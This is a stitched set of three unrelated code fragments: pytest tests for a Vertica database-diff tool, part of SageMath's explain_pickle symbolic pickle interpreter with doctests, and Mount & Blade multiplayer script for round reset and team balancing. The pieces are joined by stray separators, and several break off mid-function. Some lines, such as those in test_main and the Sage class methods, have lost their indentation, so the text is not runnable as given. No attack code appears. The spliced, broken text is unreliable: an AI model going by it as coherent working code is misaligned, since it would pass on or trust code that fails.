        'VERTICA_USERNAME': 'dbadmin',
        'VERTICA_PASSWORD': '',
    }
    for name, value in connection_env.items():
        os.environ[name] = value
    with get_cur() as c:
        yield c
def create_schema(cur):
    """Create the scratch ``dbdiff`` schema used by these tests."""
    cur.execute('CREATE SCHEMA dbdiff;')
def create_x_table(cur):
    """Create and populate dbdiff.x_table: three matching rows, two rows
    missing on the y side per join2, and rows missing per join1."""
    statements = (
        'CREATE TABLE dbdiff.x_table ( join1 varchar(10), join2 varchar(10), missingx int, missingx2 int, dtypemiss int, data1 int, data2 int, data3 date, data4 varchar(10));',
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'matchdup21', 0, 0, 0, 0, 0, '2017-10-11', '');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match22', 0, 0, 0, 0, 0, '2017-10-11', 'a');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match23', 0, 0, 0, 1, 1, '2017-10-11', '');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'missx21', null, null, null, null, null, null, '');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'missx22', null, null, null, null, null, null, '');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'missx11', null, null, null, null, null, null, null, '');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'missx12', null, null, null, null, null, null, null, '');",
        "INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select null, null, null, null, null, null, null, null, '');",
        'COMMIT;',
    )
    for statement in statements:
        cur.execute(statement)
def create_y_table(cur, case_off: bool = False):
    """Create and populate dbdiff.y_table, including a duplicated join key.

    With ``case_off`` the 'match22' row stores an uppercase 'A' so that it
    no longer matches the lowercase 'a' in x_table.
    """
    statements = [
        'CREATE TABLE dbdiff.y_table ( join1 varchar(10), join2 varchar(10), missingy int, dtypemiss date, data1 int, data2 int, data3 date, data4 varchar(10));',
        "INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'matchdup21', 0, '2019-04-22', 0, 0, '2017-10-11', '');",
        "INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'matchdup21', 0, '2019-04-22', 0, 0, '2017-10-11', '');",
    ]
    if case_off:
        # here, we'll uppercase the 'A' so that these don't match
        statements.append("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match22', 0, '2019-04-22', 0, 1, '2017-10-12', 'A');")
    else:
        statements.append("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match22', 0, '2019-04-22', 0, 1, '2017-10-12', 'a');")
    statements += [
        "INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match23', 0, '2019-04-22', 0, 0, '2017-10-13', '');",
        "INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'missy21', 0, '2019-04-22', 0, 0, null, '');",
        "INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'missy11', null, 0, '2019-04-22', 0, 0, null, '');",
        'COMMIT;',
    ]
    for statement in statements:
        cur.execute(statement)
def drop_schema(cur):
    """Drop the scratch ``dbdiff`` schema and everything in it."""
    cur.execute('DROP SCHEMA IF EXISTS dbdiff CASCADE;')
def test_drop_data_start(cur):
    """Start from a clean slate before the data-creation tests run."""
    drop_schema(cur)
def test_create_data(cur):
    """Create the schema and both fixture tables used by later tests."""
    create_schema(cur)
    create_x_table(cur)
    create_y_table(cur)
def test_get_column_info(cur):
    """get_column_info returns a DataFrame with name and type columns."""
    column_info = get_column_info(cur, 'dbdiff', 'x_table')
    # isinstance instead of ``type(...) ==``: the idiomatic type check,
    # and it also accepts DataFrame subclasses.
    assert isinstance(column_info, pd.DataFrame)
    assert 'column_name' in column_info.columns
    assert 'data_type' in column_info.columns
def test_get_column_info_lookup(cur):
    """The lookup maps every x_table column name to its declared dtype."""
    lookup = get_column_info_lookup(cur, 'dbdiff', 'x_table')
    assert 'data1' in lookup
    assert lookup['join1'].lower() == 'varchar(10)'
    assert lookup['data1'] == 'int'
    assert lookup['data2'] == 'int'
    assert lookup['data3'] == 'date'
    # x_table has 9 columns in total.
    assert len(lookup) == 9
def test_get_table_exists(cur):
    """Both fixture tables exist; a never-created table does not."""
    assert get_table_exists(cur, 'dbdiff', 'x_table')
    assert get_table_exists(cur, 'dbdiff', 'y_table')
    assert not get_table_exists(cur, 'dbdiff', 'z_table')
def test_check_primary_key(cur):
    """(join1, join2) is unique in x_table; join1 alone has 4 duplicate rows."""
    full_key_dups = check_primary_key(cur, 'dbdiff', 'x_table',
                                      ['join1', 'join2'])
    assert full_key_dups == 0
    assert check_primary_key(cur, 'dbdiff', 'x_table', ['join1']) == 4
def test_select_distinct_rows(cur):
    """Deduplicating x_table on join1 splits it into dedup and dup tables."""
    x_table_rows = 8
    x_table_columns = 9
    # NOTE(review): ``use_temp_tables`` is never passed on to
    # select_distinct_rows, so both iterations run identically — confirm
    # whether a parameter was meant to be forwarded here.
    for use_temp_tables in {True, False}:
        new_table_schema, new_table_name = select_distinct_rows(cur, 'dbdiff', 'x_table', ['join1'])
        # check that new table gets create with N rows
        assert get_table_exists(cur, new_table_schema, 'x_table_dup')
        assert get_table_exists(cur, new_table_schema, 'x_table_dedup')
        cur.execute('select * from {schema}.{table}'.format(
            schema=new_table_schema,
            table=new_table_name)
        )
        dedup = pd.DataFrame(cur.fetchall())
        # Three distinct join1 values (match1, missx11, missx12 — the null
        # row groups separately) survive deduplication.
        assert dedup.shape[0] == 3
        assert dedup.shape[1] == x_table_columns
        cur.execute('select * from {schema}.{table}'.format(
            schema=new_table_schema,
            table='x_table_dup')
        )
        dup = pd.DataFrame(cur.fetchall())
        # The remaining rows land in the dup table, which carries one
        # extra bookkeeping column.
        assert dup.shape[0] == (x_table_rows - dedup.shape[0])
        assert dup.shape[1] == (x_table_columns + 1)
def test_create_joined_table(cur):
    """Joining x_table and y_table yields the expected matched rows."""
    create_joined_table(
        cur,
        x_schema='dbdiff',
        y_schema='dbdiff',
        x_table='x_table',
        y_table='y_table',
        join_cols=['join1', 'join2'],
        compare_cols=pd.concat([COMPARE_COLS, JOIN_COLS]),
        joined_schema='dbdiff',
        joined_table='x_table_JOINED'
    )
    # check that it is created and has the right number of rows, columns...
    assert get_table_exists(cur, 'dbdiff', 'x_table_JOINED')
    cur.execute(
        'select * from {schema}.{table}'.format(
            schema='dbdiff',
            table='x_table_JOINED'
        )
    )
    df = pd.DataFrame(cur.fetchall())
    # Four (join1, join2) pairs are present in both fixture tables.
    assert df.shape[0] == 4
    # double the comparing columns (x_* and y_*), and pk/join columns:
    assert df.shape[1] == ((COMPARE_COLS.shape[0] * 2) + JOIN_COLS.shape[0])
def test_get_unmatched_rows_straight(cur):
    """Counts and sample shapes for rows unmatched between x and y."""
    join_cols = ['join1', 'join2']
    # these are a bit flipped:
    # the missing_x_join are counts for rows in y that are missing in x
    # and the missing_y_join are counts for rows *in x* that are *not in y*
    # the name coming from the *not in y* part of it.
    y_minus_x = [2, 1]  # formerly, "missing_x_join", now using set notation
    x_minus_y = [3, 2]  # etc
    results = get_unmatched_rows_straight(
        cur,
        'dbdiff',
        'dbdiff',
        'x_table',
        'y_table',
        join_cols,
        100
    )
    expected_results = {
        side: {
            'count': sum(diff),
            'sample_shape': (sum(diff), len(join_cols))
        }
        for side, diff in (('x', x_minus_y), ('y', y_minus_x))
    }
    print(results)
    print(expected_results)
    for side, expected in expected_results.items():
        assert results[side]['count'] == expected['count']
        assert results[side]['sample'].shape[0] == expected['sample_shape'][0]
        assert results[side]['sample'].shape[1] == expected['sample_shape'][1]
def test_get_unmatched_rows(cur):
    """Check per-join-column grouped results reported by get_unmatched_rows."""
    join_cols = ['join1', 'join2']
    # These are, again, a little weird; see the note in
    # test_get_unmatched_rows_straight().
    y_minus_x = [2, 1]
    x_minus_y = [3, 2]
    results = get_unmatched_rows(
        cur,
        'dbdiff',
        'dbdiff',
        'x_table',
        'y_table',
        join_cols,
        100
    )
    # Expected counts/sample shapes per join column and per side; the sample
    # width grows by one column for each additional join column.
    expected_results = {}
    for i, col in enumerate(join_cols):
        expected_results[col] = {
            side: {
                'count': counts[i],
                'sample_shape': (counts[i], i + 1),
            }
            for side, counts in (('x', x_minus_y), ('y', y_minus_x))
        }
    for col, expected in expected_results.items():
        logging.info(col)
        for side, expected_info in expected.items():
            logging.info(side)
            logging.info(results[col][side]['count'])
            logging.info(results[col][side]['sample'])
            assert 'sample' in results[col][side]
            assert 'query' in results[col][side]
            assert results[col][side]['count'] == expected_info['count']
            for axis in (0, 1):
                assert results[col][side]['sample'].shape[axis] == expected_info['sample_shape'][axis]
            if col == 'join2':
                assert 'sample_grouped' in results[col][side]
                assert 'query_grouped' in results[col][side]
def test_create_diff_table(cur):
    """The diff table should exist after create_diff_table runs."""
    all_cols = pd.concat([COMPARE_COLS, JOIN_COLS])
    create_diff_table(cur, 'dbdiff', 'x_table_DIFF', ['join1', 'join2'], all_cols)
    assert get_table_exists(cur, 'dbdiff', 'x_table_DIFF')
def test_insert_diff_table(cur):
    """Insert diffs for two columns and verify the cumulative row counts.

    The diff table accumulates rows: diffing 'data1' contributes one row,
    and diffing 'data2' brings the running total to three.  The two
    insert/verify rounds were previously duplicated verbatim; they are
    folded into one data-driven loop here.
    """
    cur.execute('select * from dbdiff.x_table_JOINED')
    logging.info(cur.fetchall())
    cur.execute('select * from dbdiff.x_table_DIFF')
    logging.info(cur.fetchall())
    # (column to diff, expected cumulative row count after its insert)
    for column, expected_rows in (('data1', 1), ('data2', 3)):
        insert_diff_table(
            cur,
            joined_schema='dbdiff',
            joined_table='x_table_JOINED',
            diff_schema='dbdiff',
            diff_table='x_table_DIFF',
            join_cols=['join1', 'join2'],
            column=column
        )
        cur.execute('select * from {schema}.{table}'.format(schema='dbdiff', table='x_table_DIFF'))
        df = pd.DataFrame(cur.fetchall())
        assert df.shape[0] == expected_rows
        assert df.shape[1] == 3
# def test_implicit_dytpe_comparison():
# implicit_dytpe_comparison(x_dtype, y_dtype)
def test_get_diff_rows(cur):
    """Summarize differing rows: distinct count, total count, sample size."""
    diff_summary = get_diff_rows(cur, 'dbdiff', 'x_table', ['join1', 'join2'], 100)
    expected_distinct = 2
    assert diff_summary['count'] == expected_distinct
    assert diff_summary['total_count'] == 3
    assert diff_summary['sample'].shape[0] == expected_distinct
    # assert diff_summary['sample'].shape[1] == 10
def test_get_diff_columns(cur):
    """get_diff_columns should report a 2x2 frame of differing columns."""
    df = get_diff_columns(cur, 'dbdiff', 'x_table')
    assert df.shape == (2, 2)
def test_get_column_diffs(cur):
    """Verify per-column diff groupings: counts, queries and frame shapes."""
    join_cols = ['join1', 'join2']
    diff_columns = get_diff_columns(cur, 'dbdiff', 'x_table')
    grouped_column_diffs = get_column_diffs(
        diff_columns, cur,
        'dbdiff',
        'dbdiff',
        'x_table',
        'dbdiff',
        'y_table',
        ['join1', 'join2'],
        100,
        COMPARE_COLS,
        True
    )
    logging.info(grouped_column_diffs)
    width = len(join_cols)
    # Expected shapes per diffed column; histogram frames (df_h_*) always
    # have 5 rows here.
    expected = {}
    for column, misses in (('data1', 1), ('data2', 2)):
        expected[column] = {
            'count': misses,
            'df_shape': (misses, 3),
            'df_raw_shape': (misses, 2 + width),
            'df_h_x_shape': (5, 1 + width),
            'df_h_y_shape': (5, 1 + width),
        }
    for column_name, info in expected.items():
        grouped_column_diffs[column_name]
        logging.info(grouped_column_diffs[column_name])
        assert info['count'] == grouped_column_diffs[column_name]['count']
        for q_name in ('q', 'q_raw', 'q_h_x', 'q_h_y'):
            assert q_name in grouped_column_diffs[column_name]
        for axis in (0, 1):
            for shape_key in ('df_shape', 'df_raw_shape', 'df_h_x_shape', 'df_h_y_shape'):
                frame_key = shape_key.replace('_shape', '')
                assert info[shape_key][axis] == grouped_column_diffs[column_name][frame_key].shape[axis]
def test_drop_data_end(cur):
    """Tear down: drop the dbdiff schema created by the earlier tests."""
    drop_schema(cur)
def test_main(cur):
create_schema(cur)
create_x_table(cur)
create_y_table(cur)
base_options = ['dbdiff', | |
raise ValueError("Not safe to evaluate code generated with default_assumptions")
from sage.misc.sage_eval import sage_eval
result = sage_eval(ans, preparse=preparse)
print(ans)
return result
else:
return ans
valid_name_re = re.compile('^[a-zA-Z_][a-zA-Z0-9_]*$')

def name_is_valid(name):
    r"""
    Test whether a string is a valid Python identifier. (We use a
    conservative test, that only allows ASCII identifiers.)

    Python keywords are rejected as well: they match the identifier
    syntax but cannot be used as names.

    EXAMPLES::

        sage: from sage.misc.explain_pickle import name_is_valid
        sage: name_is_valid('fred')
        True
        sage: name_is_valid('Yes!ValidName')
        False
        sage: name_is_valid('_happy_1234')
        True
        sage: name_is_valid('lambda')
        False
    """
    import keyword
    # The regular expression alone would accept keywords such as
    # 'lambda' or 'class'; reject them explicitly.
    return bool(valid_name_re.match(name)) and not keyword.iskeyword(name)
# The pickle interpreter can push and pop "marks" on the stack.
# This string is used as the representation of a mark.  Mark detection
# is done by identity (``v is the_mark``), so the particular string
# value is irrelevant.
the_mark = 'mark'
class PickleObject(object):
    r"""
    A stack value carrying extra information for the pickle interpreter.

    Pickles have a stack-based virtual machine.  The explain_pickle
    pickle interpreter mostly uses SageInputExpressions, from sage_input,
    as the stack values.  When more information about a stack value is
    useful (so that prettier, less confusing code can be generated), a
    PickleObject is pushed instead.  It bundles a value (a standard
    Python value, a PickleDict, or a PickleInstance), an expression
    (a SageInputExpression), and an ``immutable`` flag recording whether
    the object has been converted to a SageInputExpression; once it has,
    the object must no longer be mutated, since the SageInputExpression
    would not reflect the changes.
    """

    def __init__(self, value, expression):
        r"""
        Construct a PickleObject.

        TESTS::

            sage: from sage.misc.explain_pickle import *
            sage: v = PickleObject(1, 2)
            sage: v.value
            1
            sage: v.expression
            2
            sage: v.immutable
            False
        """
        self.value, self.expression = value, expression
        self.immutable = False

    def _sage_input_(self, sib, coerced):
        r"""
        Return the stored expression and set the immutable flag.

        TESTS::

            sage: from sage.misc.explain_pickle import *
            sage: v = PickleObject(1, 2)
            sage: v.immutable
            False
            sage: v._sage_input_('sib', False)
            2
            sage: v.immutable
            True
        """
        self.immutable = True
        return self.expression
class PickleDict(object):
    r"""
    A dictionary-literal marker usable as the value of a PickleObject.

    The ``items`` attribute is a list of key-value pairs, where keys and
    values are SageInputExpressions.  Keeping the pairs around allows a
    dictionary literal to be emitted directly, instead of starting from
    an empty dictionary and assigning into it.
    """

    def __init__(self, items):
        r"""
        Initialize a PickleDict.

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: PickleDict([('a', 1)]).items
            [('a', 1)]
        """
        self.items = items
class PickleInstance(object):
    r"""
    A class marker usable as the value of a PickleObject.

    Unlike other possible values of a PickleObject, a PickleInstance does
    not represent an exact value; it records only the class (type) of
    the object.
    """

    def __init__(self, klass):
        r"""
        Initialize a PickleInstance.

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: PickleInstance(Integer).klass
            <type 'sage.rings.integer.Integer'>
        """
        self.klass = klass
class PickleExplainer(object):
r"""
An interpreter for the pickle virtual machine, that executes
symbolically and constructs SageInputExpressions instead of
directly constructing values.
"""
def __init__(self, sib, in_current_sage=False, default_assumptions=False,
pedantic=False):
r"""
Initialize a PickleExplainer interpreter for the pickle virtual machine.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: pe = PickleExplainer(SageInputBuilder(), in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.in_current_sage
True
sage: pe.pedantic
True
"""
self.sib = sib
self.in_current_sage = in_current_sage
self.default_assumptions = default_assumptions
self.pedantic = pedantic
self.stopped = False
self.stack = []
self.memo = {}
if in_current_sage and default_assumptions:
raise ValueError("in_current_sage and default_assumptions must not both be true")
self.new_instance = self.sib.import_name('types', 'InstanceType')
def run_pickle(self, p):
r"""
Given an (uncompressed) pickle as a string, run the pickle
in this virtual machine. Once a STOP has been executed, return
the result (a SageInputExpression representing code which, when
evaluated, will give the value of the pickle).
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: sib(pe.run_pickle('T\5\0\0\0hello.')) # py2
{atomic:'hello'}
"""
for (op, arg, pos) in genops(p):
assert(not(self.stopped))
try:
handler = getattr(self, op.name)
except AttributeError:
raise NotImplementedError('PickleExplainer does not yet handle opcode %s' % op.name)
if arg is None:
handler()
else:
handler(arg)
assert(self.stopped)
assert(len(self.stack) == 1)
return self.stack[0]
    def check_value(self, v):
        r"""
        Check that the given value is either a SageInputExpression or a
        PickleObject. Used for internal sanity checking.

        Raises an ``AssertionError`` for any other type (and is a no-op
        when Python runs with assertions disabled).

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: from sage.misc.sage_input import SageInputBuilder
            sage: sib = SageInputBuilder()
            sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
            sage: pe.check_value(7)
            Traceback (most recent call last):
            ...
            AssertionError
            sage: pe.check_value(sib(7))
        """
        assert(isinstance(v, (SageInputExpression, PickleObject)))
    def push(self, v):
        r"""
        Push a value onto the virtual machine's stack.

        The value must be a SageInputExpression or a PickleObject; this
        is enforced by :meth:`check_value`.

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: from sage.misc.sage_input import SageInputBuilder
            sage: sib = SageInputBuilder()
            sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
            sage: pe.push(sib(7))
            sage: pe.stack[-1]
            {atomic:7}
        """
        self.check_value(v)
        self.stack.append(v)
    def push_and_share(self, v):
        r"""
        Push a value onto the virtual machine's stack; also mark it as
        shared for sage_input if we are in pedantic mode (see
        :meth:`share`).

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: from sage.misc.sage_input import SageInputBuilder
            sage: sib = SageInputBuilder()
            sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
            sage: pe.push_and_share(sib(7))
            sage: pe.stack[-1]
            {atomic:7}
            sage: pe.stack[-1]._sie_share
            True
        """
        self.share(v)
        self.push(v)
def pop(self):
r"""
Pop a value from the virtual machine's stack, and return it.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push(sib(7))
sage: pe.pop()
{atomic:7}
"""
v = self.stack.pop()
self.check_value(v)
return v
    def push_mark(self):
        r"""
        Push a 'mark' onto the virtual machine's stack.

        The mark is the module-level sentinel ``the_mark``; it is later
        detected by identity in :meth:`pop_to_mark`, so it bypasses the
        usual :meth:`check_value` validation.

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: from sage.misc.sage_input import SageInputBuilder
            sage: sib = SageInputBuilder()
            sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
            sage: pe.push_mark()
            sage: pe.stack[-1]
            'mark'
            sage: pe.stack[-1] is the_mark
            True
        """
        self.stack.append(the_mark)
def pop_to_mark(self):
r"""
Pop all values down to the 'mark' from the virtual machine's stack,
and return the values as a list.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push_mark()
sage: pe.push(sib(7))
sage: pe.push(sib('hello'))
sage: pe.pop_to_mark()
[{atomic:7}, {atomic:'hello'}]
"""
slice = []
while True:
v = self.stack.pop()
if v is the_mark:
slice.reverse()
return slice
self.check_value(v)
slice.append(v)
    def share(self, v):
        r"""
        Mark a sage_input value as shared, if we are in pedantic mode,
        and return the value either way.

        EXAMPLES::

            sage: from sage.misc.explain_pickle import *
            sage: from sage.misc.sage_input import SageInputBuilder
            sage: sib = SageInputBuilder()
            sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
            sage: v = sib(7)
            sage: v._sie_share
            False
            sage: pe.share(v)
            {atomic:7}
            sage: v._sie_share
            True
        """
        if self.pedantic:
            self.sib.share(v)
        return v
def is_mutable_pickle_object(self, v):
r"""
Test whether a PickleObject is mutable (has never been converted
to a SageInputExpression).
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: v = PickleObject(1, sib(1))
sage: pe.is_mutable_pickle_object(v)
True
sage: sib(v)
{atomic:1}
sage: pe.is_mutable_pickle_object(v)
False
"""
return isinstance(v, PickleObject) and not v.immutable
# Opcodes are in alphabetical order
def APPEND(self):
r"""
TESTS::
sage: from sage.misc.explain_pickle import *
sage: test_pickle(['a']) # py2
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 1
5: U SHORT_BINSTRING 'a'
8: a APPEND
9: . STOP
highest protocol among opcodes = 2
explain_pickle in_current_sage=True/False:
['a']
result: ['a']
As shown above, we prefer to create a list literal. This is not
possible if the list is recursive::
sage: v = []
sage: v.append(v)
sage: test_pickle(v) # py2
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 1
5: h BINGET 1
7: a APPEND
8: . STOP
highest protocol among opcodes = 2
explain_pickle in_current_sage=True/False:
si = []
list.append(si, si)
si
result: [[...]]
"""
obj = self.pop()
lst = self.pop()
self._APPENDS_helper(lst, [obj])
def APPENDS(self):
r"""
TESTS::
sage: from sage.misc.explain_pickle import *
sage: test_pickle(['a', 'b']) # py2
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 1
5: ( MARK
6: U SHORT_BINSTRING 'a'
9: U SHORT_BINSTRING 'b'
12: e APPENDS (MARK at 5)
13: . STOP
highest protocol among opcodes = 2
explain_pickle in_current_sage=True/False:
['a', 'b']
result: ['a', 'b']
As shown above, we prefer to create a list literal. This is not
possible if the list is recursive::
sage: v = []
sage: v.append(v)
sage: v.append(v)
sage: test_pickle(v) # py2
0: \x80 | |
(multiplayer_send_2_int_to_player, ":cur_player", multiplayer_event_set_team_score, ":team_2_score", ":team_1_score"),
(call_script, "script_multiplayer_server_swap_player", ":cur_player"),
(try_end),
(try_end),
# Vincenzo end
#auto team balance control at the end of round
(assign, ":number_of_players_at_team_1", 0),
(assign, ":number_of_players_at_team_2", 0),
(try_for_range, ":cur_player", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":cur_player"),
(player_get_team_no, ":player_team", ":cur_player"),
(try_begin),
(eq, ":player_team", 0),
(val_add, ":number_of_players_at_team_1", 1),
(else_try),
(eq, ":player_team", 1),
(val_add, ":number_of_players_at_team_2", 1),
(try_end),
(try_end),
#end of counting active players per team.
(store_sub, ":difference_of_number_of_players", ":number_of_players_at_team_1", ":number_of_players_at_team_2"),
(assign, ":number_of_players_will_be_moved", 0),
(try_begin),
(try_begin),
(store_mul, ":checked_value", "$g_multiplayer_auto_team_balance_limit", -1),
(le, ":difference_of_number_of_players", ":checked_value"),
(store_div, ":number_of_players_will_be_moved", ":difference_of_number_of_players", -2),
(assign, ":team_with_more_players", 1),
(assign, ":team_with_less_players", 0),
(else_try),
(ge, ":difference_of_number_of_players", "$g_multiplayer_auto_team_balance_limit"),
(store_div, ":number_of_players_will_be_moved", ":difference_of_number_of_players", 2),
(assign, ":team_with_more_players", 0),
(assign, ":team_with_less_players", 1),
(try_end),
(try_end),
#number of players will be moved calculated. (it is 0 if no need to make team balance)
(try_begin),
(gt, ":number_of_players_will_be_moved", 0),
(try_begin),
(try_for_range, ":unused", 0, ":number_of_players_will_be_moved"),
(assign, ":max_player_join_time", 0),
(assign, ":latest_joined_player_no", -1),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_get_team_no, ":player_team", ":player_no"),
(eq, ":player_team", ":team_with_more_players"),
(player_get_slot, ":player_join_time", ":player_no", slot_player_join_time),
(try_begin),
(gt, ":player_join_time", ":max_player_join_time"),
(assign, ":max_player_join_time", ":player_join_time"),
(assign, ":latest_joined_player_no", ":player_no"),
(try_end),
(try_end),
(try_begin),
(ge, ":latest_joined_player_no", 0),
(try_begin),
#if player is living add +1 to his kill count because he will get -1 because of team change while living.
(player_get_agent_id, ":latest_joined_agent_id", ":latest_joined_player_no"),
(ge, ":latest_joined_agent_id", 0),
(agent_is_alive, ":latest_joined_agent_id"),
(player_get_kill_count, ":player_kill_count", ":latest_joined_player_no"), #adding 1 to his kill count, because he will lose 1 undeserved kill count for dying during team change
(val_add, ":player_kill_count", 1),
(player_set_kill_count, ":latest_joined_player_no", ":player_kill_count"),
(player_get_death_count, ":player_death_count", ":latest_joined_player_no"), #subtracting 1 to his death count, because he will gain 1 undeserved death count for dying during team change
(val_sub, ":player_death_count", 1),
(player_set_death_count, ":latest_joined_player_no", ":player_death_count"),
(player_get_score, ":player_score", ":latest_joined_player_no"), #adding 1 to his score count, because he will lose 1 undeserved score for dying during team change
(val_add, ":player_score", 1),
(player_set_score, ":latest_joined_player_no", ":player_score"),
(try_for_range, ":player_no", 1, multiplayer_player_loops_end), #0 is server so starting from 1
(player_is_active, ":player_no"),
(multiplayer_send_4_int_to_player, ":player_no", multiplayer_event_set_player_score_kill_death, ":latest_joined_player_no", ":player_score", ":player_kill_count", ":player_death_count"),
(try_end),
(try_end),
(player_set_troop_id, ":latest_joined_player_no", -1),
(player_set_team_no, ":latest_joined_player_no", ":team_with_less_players"),
(multiplayer_send_message_to_player, ":latest_joined_player_no", multiplayer_event_force_start_team_selection),
(try_end),
(try_end),
#tutorial message (after team balance)
#(tutorial_message_set_position, 500, 500),
#(tutorial_message_set_size, 30, 30),
#(tutorial_message_set_center_justify, 1),
#(tutorial_message, "str_auto_team_balance_done", 0xFFFFFFFF, 5),
#for only server itself
(call_script, "script_show_multiplayer_message", multiplayer_message_type_auto_team_balance_done, 0),
#no need to send also server here
(try_for_range, ":player_no", 1, multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(multiplayer_send_int_to_player, ":player_no", multiplayer_event_show_multiplayer_message, multiplayer_message_type_auto_team_balance_done),
(try_end),
(assign, "$g_team_balance_next_round", 0),
(try_end),
(try_end),
#team balance check part finished
(assign, "$g_team_balance_next_round", 0),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_set_slot, ":player_no", slot_player_spawned_this_round, 0),
(player_set_slot, ":player_no", slot_player_spawned_at_siege_round, 0),
# AoN
(neq,":player_no",0),
(multiplayer_send_message_to_player, ":player_no", multiplayer_event_return_before_round_end),
(try_end),
#initialize my team at start of round (it will be assigned again at next round's first death)
(assign, "$my_team_at_start_of_round", -1),
(call_script, "script_multiplayer_mm_reset_stuff_after_round_before_clear"),
#clear scene and end round
(multiplayer_clear_scene),
  #assigning everybody's spawn counts to 0
(assign, "$g_my_spawn_count", 0),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_set_slot, ":player_no", slot_player_spawn_count, 0),
(try_end),
(call_script, "script_initialize_objects"),
#initialize moveable object positions
(call_script, "script_multiplayer_initialize_belfry_wheel_rotations"),
(call_script, "script_multiplayer_close_gate_if_it_is_open"),
(call_script, "script_multiplayer_move_moveable_objects_initial_positions"),
#initialize flag coordinates (move up the flag at pole)
(try_for_range, ":flag_no", 0, "$g_number_of_flags"),
(scene_prop_get_instance, ":pole_id", "spr_headquarters_pole_code_only", ":flag_no"),
(prop_instance_get_position, pos1, ":pole_id"),
(position_move_z, pos1, multi_headquarters_pole_height),
(scene_prop_get_instance, ":flag_id", "$team_1_flag_scene_prop", ":flag_no"),
(prop_instance_stop_animating, ":flag_id"),
(prop_instance_set_position, ":flag_id", pos1),
(try_end),
(assign, "$g_round_ended", 0),
(store_mission_timer_a, "$g_round_start_time"),
(call_script, "script_initialize_all_scene_prop_slots"),
#initialize round start time for clients
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(multiplayer_send_int_to_player, ":player_no", multiplayer_event_set_round_start_time, -9999),
(try_end),
(assign, "$g_flag_is_not_ready", 0),
#MM
(call_script, "script_multiplayer_mm_reset_stuff_after_round"),
]),
(1, 0, 0, [(multiplayer_is_server),],
[
(store_mission_timer_a, ":round_time"),
(val_sub, ":round_time", "$g_round_start_time"),
(assign, ":num_active_players_in_team_0", 0),
(assign, ":num_active_players_in_team_1", 0),
(assign, ":num_active_players", 0),
(try_for_range, ":cur_player", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":cur_player"),
(player_get_team_no, ":cur_player_team", ":cur_player"),
(try_begin),
(eq, ":cur_player_team", 0),
